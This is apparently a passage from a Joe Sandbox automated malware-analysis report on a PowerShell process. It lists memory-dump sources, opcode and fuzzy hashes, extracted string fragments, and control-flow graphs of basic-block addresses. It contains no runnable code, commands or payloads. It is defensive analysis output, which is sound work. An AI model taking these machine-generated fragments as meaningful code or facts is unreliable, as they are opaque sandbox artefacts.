                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a2e72ba82e3216d0589cd457d737cfb407ae19dacf2315f7b5d851dc1697f411
                                                                                                                                    • Instruction ID: 1d409532c1aefd0779d8a741560940dd6713e690c8ec38829fa3ddd6568a7096
                                                                                                                                    • Opcode Fuzzy Hash: a2e72ba82e3216d0589cd457d737cfb407ae19dacf2315f7b5d851dc1697f411
                                                                                                                                    • Instruction Fuzzy Hash: EA91F2B4E05218CFDB14CFA9D894BA9B7F2FB4A340F5081AED509AB356DB349985CF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675965538.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77c0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 30841eb410f47f68faa1c9edc7c8f2f08924c42943596ae3e62a469352232729
                                                                                                                                    • Instruction ID: caaa4b69e9d21a2bd8f5108519bb0c07b3bc2c90a04933fc9b86403bef76a0cf
                                                                                                                                    • Opcode Fuzzy Hash: 30841eb410f47f68faa1c9edc7c8f2f08924c42943596ae3e62a469352232729
                                                                                                                                    • Instruction Fuzzy Hash: D791C1B4E05218CFDB14CFA9D494BA9B7F2FB4A344F5081AED509AB356DB349985CF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e5fa2d7c19bcdab0e4d32d9737390b9d182f423c7b554308630b556fa95346ac
                                                                                                                                    • Instruction ID: 71d6227dc9abf8e83a668eac11811bed2bb6bb4785b534758a6b00f3de9cd5e7
                                                                                                                                    • Opcode Fuzzy Hash: e5fa2d7c19bcdab0e4d32d9737390b9d182f423c7b554308630b556fa95346ac
                                                                                                                                    • Instruction Fuzzy Hash: 9D4122B1E056189BDB19CF6BD84059AFBF7AFC9340F04C1FAD548AB265DB304A828F51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $ak$(ffl$(ffl$(ffl$(ffl$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.Wk$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-808753519
                                                                                                                                    • Opcode ID: 6c5e0708150debab80ee3a38a0c37a79229aa4fe670fd29cb410542dda9209fe
                                                                                                                                    • Instruction ID: d077af1cce1fbae1ccfe1138df892a547b98b3eaddb6ae872ec721ef0a431a34
                                                                                                                                    • Opcode Fuzzy Hash: 6c5e0708150debab80ee3a38a0c37a79229aa4fe670fd29cb410542dda9209fe
                                                                                                                                    • Instruction Fuzzy Hash: 9CB206B1B04245DFDB14CFA9D840A6ABBFAAFC9314F24C06AE9158B751DB31DC41CB91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ffl$(odq$(odq$,FXk$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$84dl$84dl$tPdq$tPdq$x.Wk$-Wk
                                                                                                                                    • API String ID: 0-4196141721
                                                                                                                                    • Opcode ID: 00b6adf129f05ba2b230a680bf9dc806b30bfb2b4649c91fedc22db17ad75a69
                                                                                                                                    • Instruction ID: e48a685d1534303e876ae521a908ec775867b5d5b0843d9dd73a5029828893c6
                                                                                                                                    • Opcode Fuzzy Hash: 00b6adf129f05ba2b230a680bf9dc806b30bfb2b4649c91fedc22db17ad75a69
                                                                                                                                    • Instruction Fuzzy Hash: CEE26E74A012148FDB64DB58C845BAEBBB2FF89304F1081D9E909AB351DB75EE81CF91

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 786 75d40c7-75d40da 787 75d4b4c-75d4b95 786->787 788 75d40e0-75d4164 786->788 802 75d370f 787->802 803 75d3716-75d373a 787->803 800 75d4166-75d418b 788->800 801 75d4193-75d4210 788->801 800->801 823 75d423f-75d424c 801->823 824 75d4212-75d4237 801->824 802->803 805 75d37d0-75d37f4 802->805 806 75d373c-75d3761 803->806 807 75d3769-75d37c9 803->807 809 75d37f6-75d381b 805->809 810 75d3823-75d3830 805->810 806->807 807->805 809->810 810->787 813 75d3836-75d3864 810->813 813->787 819 75d386a-75d3898 813->819 819->787 825 75d389e-75d38cc 819->825 823->787 827 75d4252-75d42a0 823->827 824->823 825->787 831 75d38d2-75d39af 825->831 827->787 835 75d42a6-75d42c2 827->835 851 75d3c75-75d3c99 831->851 852 75d39b5-75d39cf 831->852 835->787 839 75d42c8-75d4305 835->839 839->787 845 75d430b-75d4349 839->845 845->787 850 75d434f-75d4416 845->850 850->787 883 75d441c-75d446c 850->883 853 75d3cc8-75d3dde 851->853 854 75d3c9b-75d3cc0 851->854 855 75d39fe-75d3a0b 852->855 856 75d39d1-75d39f6 852->856 902 75d3de4-75d3dfe 853->902 903 75d4041-75d406f 853->903 854->853 858 75d3c2c-75d3c70 855->858 859 75d3a11-75d3a55 855->859 856->855 858->851 859->858 870 75d3a5b-75d3a7b 859->870 870->858 877 75d3a81-75d3ab4 870->877 877->858 887 75d3aba-75d3b1a 877->887 883->787 894 75d4472-75d44b7 883->894 887->858 898 75d3b20-75d3bce 887->898 906 75d44c2-75d44ce 894->906 898->858 929 75d3bd0-75d3c2a 898->929 908 75d3e28 902->908 909 75d3e00-75d3e0c 902->909 923 75d4074-75d40c4 903->923 914 75d44d3-75d451a 906->914 910 75d3e2e-75d3e7c 908->910 911 75d3e0e-75d3e14 909->911 912 75d3e16-75d3e1c 909->912 910->903 933 75d3e82-75d3e97 910->933 916 75d3e26 911->916 912->916 921 75d451c-75d4541 914->921 922 75d4549-75d457e 914->922 916->910 921->922 922->787 930 75d4584-75d45a8 922->930 923->786 929->851 930->787 937 75d45ae-75d460a 930->937 941 75d3e99-75d3e9f 933->941 942 75d3eb1-75d3ee6 933->942 958 75d460c-75d4621 937->958 959 75d462f-75d4635 937->959 943 75d3ea1 941->943 944 75d3ea3-75d3eaf 941->944 942->903 953 75d3eec-75d3f0c 942->953 943->942 944->942 953->903 956 75d3f12-75d3ff6 953->956 956->903 985 75d3ff8-75d403f 956->985 961 75d463b-75d4682 958->961 959->961 965 75d4684-75d46a9 961->965 966 75d46b1-75d46be 961->966 965->966 966->787 968 75d46c4-75d46f2 966->968 968->787 973 75d46f8-75d4726 968->973 973->787 976 75d472c-75d475a 973->976 976->787 980 75d4760-75d483d 976->980 996 75d4b9a-75d4ca2 980->996 997 75d4843-75d485d 980->997 985->923 1004 75d4ca4-75d4cc9 996->1004 1005 75d4cd1-75d4d06 996->1005 999 75d488c-75d4899 997->999 1000 75d485f-75d4884 997->1000 1001 75d489f-75d48e3 999->1001 1002 75d4b01-75d4b4a 999->1002 1000->999 1001->1002 1015 75d48e9-75d4909 1001->1015 1002->996 1004->1005 1013 75d4d0c-75d4d3a 1005->1013 1014 75d4df1-75d4e35 1005->1014 1013->1014 1019 75d4d40-75d4db2 1013->1019 1033 75d4e3a 1014->1033 1015->1002 1023 75d490f-75d4942 1015->1023 1038 75d4db4-75d4dcf 1019->1038 1039 75d4de0-75d4de6 1019->1039 1023->1002 1032 75d4948-75d49a8 1023->1032 1032->1002 1041 75d49ae-75d4a0e 1032->1041 1033->1033 1039->1014 1041->1002 1046 75d4a14-75d4a9d 1041->1046 1046->1002 1051 75d4a9f-75d4afc 1046->1051 1051->996
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ffl$(ffl$(ffl$,FXk$,FXk$,FXk$4'dq$4'dq$x.Wk$-Wk
                                                                                                                                    • API String ID: 0-970352782
                                                                                                                                    • Opcode ID: d9557d5ca4c53b6e0a638706e841be94effe1dda0c28014750bbbdd37bc4d94a
                                                                                                                                    • Instruction ID: 2bf5d2c311297b0a36b82b51f91d58b9ede55df97c76d5803bc50025c548c077
                                                                                                                                    • Opcode Fuzzy Hash: d9557d5ca4c53b6e0a638706e841be94effe1dda0c28014750bbbdd37bc4d94a
                                                                                                                                    • Instruction Fuzzy Hash: E5C24FB4A002148FDB64DB58C851BE9BBB2FF85304F1481E9DA09AB751CB71ED82CF95

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1056 75d3128-75d312d 1057 75d318f-75d31e7 1056->1057 1058 75d312f-75d3176 1056->1058 1066 75d31ec-75d3214 1057->1066 1061 75d342c-75d3475 1058->1061 1062 75d317c-75d318e 1058->1062 1075 75d3513-75d352d 1061->1075 1062->1057 1066->1061 1070 75d321a-75d32ae 1066->1070 1070->1075 1090 75d32b4-75d32ce 1070->1090 1076 75d355c-75d3591 1075->1076 1077 75d352f-75d3554 1075->1077 1082 75d4b9c-75d4be5 1076->1082 1083 75d3597-75d35bb 1076->1083 1077->1076 1114 75d4bea-75d4ca2 1082->1114 1083->1082 1087 75d35c1-75d361d 1083->1087 1124 75d361f-75d362e 1087->1124 1125 75d3633 1087->1125 1092 75d32d7-75d32fb 1090->1092 1093 75d32d0 1090->1093 1097 75d32fd-75d3322 1092->1097 1098 75d332a-75d337b 1092->1098 1093->1092 1095 75d3427 1093->1095 1096 75d3382-75d33a6 1093->1096 1095->1075 1100 75d33ac-75d33d9 1096->1100 1101 75d3638-75d365c 1096->1101 1097->1098 1098->1096 1100->1101 1102 75d365e-75d3683 1101->1102 1103 75d368b-75d3698 1101->1103 1102->1103 1103->1082 1107 75d369e-75d36ed 1103->1107 1107->1114 1129 75d36f3-75d36f5 1107->1129 1119 75d4ca4-75d4cc9 1114->1119 1120 75d4cd1-75d4d06 1114->1120 1119->1120 1130 75d4d0c-75d4d3a 1120->1130 1131 75d4df1-75d4e35 1120->1131 1125->1101 1133 75d36fb-75d370d 1129->1133 1130->1131 1138 75d4d40-75d4db2 1130->1138 1162 75d4e3a 1131->1162 1135 75d370f 1133->1135 1136 75d3716-75d373a 1133->1136 1135->1136 1139 75d37d0-75d37f4 1135->1139 1140 75d373c-75d3761 1136->1140 1141 75d3769-75d37c9 1136->1141 1171 75d4db4-75d4dcf 1138->1171 1172 75d4de0-75d4de6 1138->1172 1142 75d37f6-75d381b 1139->1142 1143 75d3823-75d3830 1139->1143 1140->1141 1141->1139 1142->1143 1147 75d4b4c-75d4b95 1143->1147 1148 75d3836-75d3864 1143->1148 1147->1133 1148->1147 1157 75d386a-75d3898 1148->1157 1157->1147 1164 75d389e-75d38cc 1157->1164 1162->1162 1164->1147 1170 75d38d2-75d39af 1164->1170 1183 75d3c75-75d3c99 1170->1183 1184 75d39b5-75d39cf 1170->1184 1172->1131 1185 75d3cc8-75d3dde 1183->1185 1186 75d3c9b-75d3cc0 1183->1186 1187 75d39fe-75d3a0b 1184->1187 1188 75d39d1-75d39f6 1184->1188 1221 75d3de4-75d3dfe 1185->1221 1222 75d4041-75d406f 1185->1222 1186->1185 1189 75d3c2c-75d3c70 1187->1189 1190 75d3a11-75d3a55 1187->1190 1188->1187 1189->1183 1190->1189 1199 75d3a5b-75d3a7b 1190->1199 1199->1189 1205 75d3a81-75d3ab4 1199->1205 1205->1189 1211 75d3aba-75d3b1a 1205->1211 1211->1189 1218 75d3b20-75d3bce 1211->1218 1218->1189 1241 75d3bd0-75d3c2a 1218->1241 1226 75d3e28 1221->1226 1227 75d3e00-75d3e0c 1221->1227 1237 75d4074-75d40da 1222->1237 1228 75d3e2e-75d3e7c 1226->1228 1229 75d3e0e-75d3e14 1227->1229 1230 75d3e16-75d3e1c 1227->1230 1228->1222 1244 75d3e82-75d3e97 1228->1244 1233 75d3e26 1229->1233 1230->1233 1233->1228 1237->1147 1257 75d40e0-75d4164 1237->1257 1241->1183 1250 75d3e99-75d3e9f 1244->1250 1251 75d3eb1-75d3ee6 1244->1251 1252 75d3ea1 1250->1252 1253 75d3ea3-75d3eaf 1250->1253 1251->1222 1262 75d3eec-75d3f0c 1251->1262 1252->1251 1253->1251 1271 75d4166-75d418b 1257->1271 1272 75d4193-75d4210 1257->1272 1262->1222 1265 75d3f12-75d3ff6 1262->1265 1265->1222 1292 75d3ff8-75d403f 1265->1292 1271->1272 1283 75d423f-75d424c 1272->1283 1284 75d4212-75d4237 1272->1284 1283->1147 1286 75d4252-75d42a0 1283->1286 1284->1283 1286->1147 1295 75d42a6-75d42c2 1286->1295 1292->1237 1295->1147 1298 75d42c8-75d4305 1295->1298 1298->1147 1303 75d430b-75d4349 1298->1303 1303->1147 1306 75d434f-75d4416 1303->1306 1306->1147 1313 75d441c-75d446c 1306->1313 1313->1147 1317 75d4472-75d44ce 1313->1317 1321 75d44d3-75d451a 1317->1321 1323 75d451c-75d4541 1321->1323 1324 75d4549-75d457e 1321->1324 1323->1324 1324->1147 1327 75d4584-75d45a8 1324->1327 1327->1147 1329 75d45ae-75d460a 1327->1329 1335 75d460c-75d4621 1329->1335 1336 75d462f-75d4635 1329->1336 1337 75d463b-75d4682 1335->1337 1336->1337 1340 75d4684-75d46a9 1337->1340 1341 75d46b1-75d46be 1337->1341 1340->1341 1341->1147 1342 75d46c4-75d46f2 1341->1342 1342->1147 1345 75d46f8-75d4726 1342->1345 1345->1147 1347 75d472c-75d475a 1345->1347 1347->1147 1349 75d4760-75d483d 1347->1349 1358 75d4b9a 1349->1358 1359 75d4843-75d485d 1349->1359 1358->1114 1360 75d488c-75d4899 1359->1360 1361 75d485f-75d4884 1359->1361 1362 75d489f-75d48e3 1360->1362 1363 75d4b01-75d4b4a 1360->1363 1361->1360 1362->1363 1369 75d48e9-75d4909 1362->1369 1363->1358 1369->1363 1373 75d490f-75d4942 1369->1373 1373->1363 1377 75d4948-75d49a8 1373->1377 1377->1363 1381 75d49ae-75d4a0e 1377->1381 1381->1363 1385 75d4a14-75d4a9d 1381->1385 1385->1363 1390 75d4a9f-75d4afc 1385->1390 1390->1358
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ffl$,FXk$4'dq$4'dq$4'dq$4'dq$x.Wk$-Wk
                                                                                                                                    • API String ID: 0-3680909063
                                                                                                                                    • Opcode ID: 096066a16c857962cde4aa32e5c0bd21c39491fbb0f924cdab9422c7a7583cdd
                                                                                                                                    • Instruction ID: 2fd1dd90d6b4f24cf43eaf9f8e100896c66abfe7d4794033b87f0772471be31e
                                                                                                                                    • Opcode Fuzzy Hash: 096066a16c857962cde4aa32e5c0bd21c39491fbb0f924cdab9422c7a7583cdd
                                                                                                                                    • Instruction Fuzzy Hash: FCA252B4A00218CFDB64DB18C951BE9BBB2FF85304F1085E9DA09AB751CB719D82CF95

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1395 7aecf9c-7aecffb 1398 7aecffd 1395->1398 1399 7aed004-7aed025 1395->1399 1398->1399 1400 7aed027-7aed04c 1399->1400 1401 7aed054-7aed115 1399->1401 1400->1401 1411 7aed11b-7aed17d 1401->1411 1412 7aed326-7aed351 1401->1412 1411->1412 1419 7aed183-7aed19d 1411->1419 1420 7aed356-7aed39d 1412->1420 1423 7aed19f-7aed1ab 1419->1423 1424 7aed1c7 1419->1424 1425 7aed1ad-7aed1b3 1423->1425 1426 7aed1b5-7aed1bb 1423->1426 1428 7aed1cd-7aed221 1424->1428 1429 7aed1c5 1425->1429 1426->1429 1428->1412 1435 7aed227-7aed241 1428->1435 1429->1428 1437 7aed26b 1435->1437 1438 7aed243-7aed24f 1435->1438 1441 7aed271-7aed2d5 1437->1441 1439 7aed259-7aed25f 1438->1439 1440 7aed251-7aed257 1438->1440 1442 7aed269 1439->1442 1440->1442 1441->1412 1447 7aed2d7-7aed2f3 1441->1447 1442->1441 1449 7aed2fd-7aed324 1447->1449 1449->1420
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$4'dq$4'dq$x.Wk$-Wk
                                                                                                                                    • API String ID: 0-774161434
                                                                                                                                    • Opcode ID: 8424293d9e08be88540243c8d68f5fda7d0330742d2a36dea03d033315c9f21d
                                                                                                                                    • Instruction ID: 92fefe1a3e883fb501e68d64de4d89734192b029ca744217c7a1dafd70c6db5d
                                                                                                                                    • Opcode Fuzzy Hash: 8424293d9e08be88540243c8d68f5fda7d0330742d2a36dea03d033315c9f21d
                                                                                                                                    • Instruction Fuzzy Hash: 73B19D74B003199FDB14DB68C881BAEBBB2FF85300F508599E5096B791CB759D82CF92

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1452 7ae1f20-7ae1f30 1453 7ae1f32-7ae1f3e 1452->1453 1454 7ae1f40 1452->1454 1455 7ae1f42-7ae1f44 1453->1455 1454->1455 1456 7ae1fbf-7ae1fc9 1455->1456 1457 7ae1f46-7ae1f51 1455->1457 1458 7ae1fcb-7ae1fd2 1456->1458 1459 7ae1fd5 1456->1459 1460 7ae1f6f 1457->1460 1461 7ae1f53-7ae1f59 1457->1461 1462 7ae1fd6-7ae1fdb 1459->1462 1463 7ae1f71-7ae1f7d 1460->1463 1464 7ae1f5f-7ae1f6b 1461->1464 1465 7ae1f5b-7ae1f5d 1461->1465 1466 7ae1fdd-7ae1fdf 1462->1466 1467 7ae1fe1-7ae1fed 1462->1467 1463->1456 1472 7ae1f7f-7ae1f86 1463->1472 1468 7ae1f6d 1464->1468 1465->1468 1470 7ae1fef-7ae200b 1466->1470 1467->1470 1468->1463 1474 7ae200e-7ae2014 1472->1474 1475 7ae1f8c-7ae1f91 1472->1475 1474->1462 1483 7ae2016-7ae204b 1474->1483 1477 7ae1fa9-7ae1fb2 1475->1477 1478 7ae1f93-7ae1f99 1475->1478 1484 7ae1fb7-7ae1fbc 1477->1484 1479 7ae1f9d-7ae1fa7 1478->1479 1480 7ae1f9b 1478->1480 1479->1477 1480->1477 1488 7ae204d-7ae2053 1483->1488 1489 7ae2065-7ae206c 1483->1489 1490 7ae2057-7ae2063 1488->1490 1491 7ae2055 1488->1491 1492 7ae206e-7ae2074 1489->1492 1493 7ae2084-7ae2085 1489->1493 1490->1489 1491->1489 1494 7ae2078-7ae207a 1492->1494 1495 7ae2076 1492->1495 1494->1493 1495->1493
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$<,Zk$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-4221848864
                                                                                                                                    • Opcode ID: 8edfff166e3deb58305e6ba2d5450f3be6b9396303a8694cd36e09fcb81f97fc
                                                                                                                                    • Instruction ID: f346138ab72efb3b00404aabea15b334f454c63a9e15bc2631d893be0923a1b7
                                                                                                                                    • Opcode Fuzzy Hash: 8edfff166e3deb58305e6ba2d5450f3be6b9396303a8694cd36e09fcb81f97fc
                                                                                                                                    • Instruction Fuzzy Hash: E8412DB371821A8FD7259B69D841A66BBAFAFC5320F24806BD615CB2D1DF31CC41C791
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ffl$(ffl$4'dq$h2Yk$x.Wk
                                                                                                                                    • API String ID: 0-2262983239
                                                                                                                                    • Opcode ID: b89dd00d526dd7e962a45c0cacd44c8cb7640035f539c5f81f8da1df6110fe93
                                                                                                                                    • Instruction ID: 0c4701cc76a32092733c2c372c6fdadb0ae10c28dae78bceff543ebead603b64
                                                                                                                                    • Opcode Fuzzy Hash: b89dd00d526dd7e962a45c0cacd44c8cb7640035f539c5f81f8da1df6110fe93
                                                                                                                                    • Instruction Fuzzy Hash: 00125BB4A01245DFDB14CF98C481E69BBBAAF89304F25C069F915AB755CB32EC42CB91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ffl$(ffl$4'dq$x.Wk
                                                                                                                                    • API String ID: 0-1741122386
                                                                                                                                    • Opcode ID: a6d5f55d94dfe15b6dec3c0d3415fc7f6e17da6636177e88cce44a6b4186171e
                                                                                                                                    • Instruction ID: abfcdbc3dbe1b7e258f48e87d4d0063fb2bf48377d4581385fbbb0af21ab1fd3
                                                                                                                                    • Opcode Fuzzy Hash: a6d5f55d94dfe15b6dec3c0d3415fc7f6e17da6636177e88cce44a6b4186171e
                                                                                                                                    • Instruction Fuzzy Hash: 70125CB4A01245DFDB14CF98C481A6ABBBABFC9305F15C06AF9259B755CB32EC42CB41

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2448 7ae1f05-7ae1f30 2449 7ae1f32-7ae1f3e 2448->2449 2450 7ae1f40 2448->2450 2451 7ae1f42-7ae1f44 2449->2451 2450->2451 2452 7ae1fbf-7ae1fc9 2451->2452 2453 7ae1f46-7ae1f51 2451->2453 2454 7ae1fcb-7ae1fd2 2452->2454 2455 7ae1fd5 2452->2455 2456 7ae1f6f 2453->2456 2457 7ae1f53-7ae1f59 2453->2457 2458 7ae1fd6-7ae1fdb 2455->2458 2459 7ae1f71-7ae1f7d 2456->2459 2460 7ae1f5f-7ae1f6b 2457->2460 2461 7ae1f5b-7ae1f5d 2457->2461 2462 7ae1fdd-7ae1fdf 2458->2462 2463 7ae1fe1-7ae1fed 2458->2463 2459->2452 2468 7ae1f7f-7ae1f86 2459->2468 2464 7ae1f6d 2460->2464 2461->2464 2466 7ae1fef-7ae200b 2462->2466 2463->2466 2464->2459 2470 7ae200e-7ae2014 2468->2470 2471 7ae1f8c-7ae1f91 2468->2471 2470->2458 2479 7ae2016-7ae204b 2470->2479 2473 7ae1fa9-7ae1fb2 2471->2473 2474 7ae1f93-7ae1f99 2471->2474 2480 7ae1fb7-7ae1fbc 2473->2480 2475 7ae1f9d-7ae1fa7 2474->2475 2476 7ae1f9b 2474->2476 2475->2473 2476->2473 2484 7ae204d-7ae2053 2479->2484 2485 7ae2065-7ae206c 2479->2485 2486 7ae2057-7ae2063 2484->2486 2487 7ae2055 2484->2487 2488 7ae206e-7ae2074 2485->2488 2489 7ae2084-7ae2085 2485->2489 2486->2485 2487->2485 2490 7ae2078-7ae207a 2488->2490 2491 7ae2076 2488->2491 2490->2489 2491->2489
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $dq$$dq
                                                                                                                                    • API String ID: 0-2340669324
                                                                                                                                    • Opcode ID: d39ac3c54c3c1833a2bc4a64b95cf13c897a65d2cf512c1e264965665054c4fd
                                                                                                                                    • Instruction ID: f5ac5e635991cde483fdbc0d04e57882ed3cbfc6b5c9952aa0bc0034431773f9
                                                                                                                                    • Opcode Fuzzy Hash: d39ac3c54c3c1833a2bc4a64b95cf13c897a65d2cf512c1e264965665054c4fd
                                                                                                                                    • Instruction Fuzzy Hash: 1A11CBB760935A9FD721CB54D850AA5BB7AEFC1210F1881ABEA25CB292D775C840C790

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2526 7ae0537-7ae0565 2529 7ae057d-7ae0582 2526->2529 2530 7ae0567-7ae056d 2526->2530 2533 7ae0589-7ae058b 2529->2533 2531 7ae056f 2530->2531 2532 7ae0571-7ae0573 2530->2532 2531->2529 2532->2529 2534 7ae058d-7ae0593 2533->2534 2535 7ae05a3-7ae05fa 2533->2535 2536 7ae0597-7ae0599 2534->2536 2537 7ae0595 2534->2537 2536->2535 2537->2535
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq
                                                                                                                                    • API String ID: 0-2306408947
                                                                                                                                    • Opcode ID: 11b7ccc5b6d3032791d1fb148b4af01ff5c198a8d36e70d535e6ff605f983c6f
                                                                                                                                    • Instruction ID: 945f41d7f1c04d5222170cd08e6fea91824cc5f0086bcf66c85d36ec9c36573c
                                                                                                                                    • Opcode Fuzzy Hash: 11b7ccc5b6d3032791d1fb148b4af01ff5c198a8d36e70d535e6ff605f983c6f
                                                                                                                                    • Instruction Fuzzy Hash: 3CF0A4B0B082098FDF159BB5802036E6BB67FC2148B3480AAC890CA185DBA5C842D372

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
